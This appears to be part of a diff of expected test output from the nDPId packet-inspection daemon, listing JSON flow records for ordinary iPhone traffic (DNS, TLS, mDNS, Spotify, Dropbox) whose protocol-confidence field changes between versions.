+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454552576,"flow_last_seen":1582454582628,"flow_idle_time":200000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":1020,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598373,"flow_last_seen":1582454598412,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454598766,"flow_last_seen":1582454598934,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5815,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454600454,"flow_last_seen":1582454600494,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454585624,"flow_last_seen":1582454585624,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454553607,"flow_last_seen":1582454586688,"flow_idle_time":200000,"flow_min_l4_payload_len":362,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1881,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":140000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff98:a29c","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598209,"flow_last_seen":1582454598248,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1582454599934,"flow_last_seen":1582454600426,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9568,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} 00590{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454560698,"flow_last_seen":1582454560698,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.1","src_port":5351,"dst_port":5350,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454560698,"flow_last_seen":1582454560698,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.1","src_port":5351,"dst_port":5350,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598373,"flow_last_seen":1582454599396,"flow_idle_time":200000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1582454553606,"flow_last_seen":1582454586688,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1926,"flow_avg_l4_payload_len":481,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454556158,"flow_last_seen":1582454586170,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598212,"flow_last_seen":1582454598252,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55914,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":64203,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454599065,"flow_last_seen":1582454599105,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62160,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598759,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454599073,"flow_last_seen":1582454599105,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454598416,"flow_last_seen":1582454600719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5836,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454598418,"flow_last_seen":1582454600719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5858,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1582454598377,"flow_last_seen":1582454598754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9046,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1582454600508,"flow_last_seen":1582454600678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9599,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1582454598387,"flow_last_seen":1582454598716,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":696,"flow_tot_l4_payload_len":827,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"}} -00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454596364,"flow_last_seen":1582454597360,"flow_idle_time":140000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454595354,"flow_last_seen":1582454599568,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598755,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454599929,"flow_last_seen":1582454599930,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1582454553606,"flow_last_seen":1582454586688,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1926,"flow_avg_l4_payload_len":481,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454556158,"flow_last_seen":1582454586170,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598212,"flow_last_seen":1582454598252,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55914,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":64203,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454599065,"flow_last_seen":1582454599105,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62160,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598759,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454599073,"flow_last_seen":1582454599105,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454598416,"flow_last_seen":1582454600719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5836,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454598418,"flow_last_seen":1582454600719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5858,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1582454598377,"flow_last_seen":1582454598754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9046,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 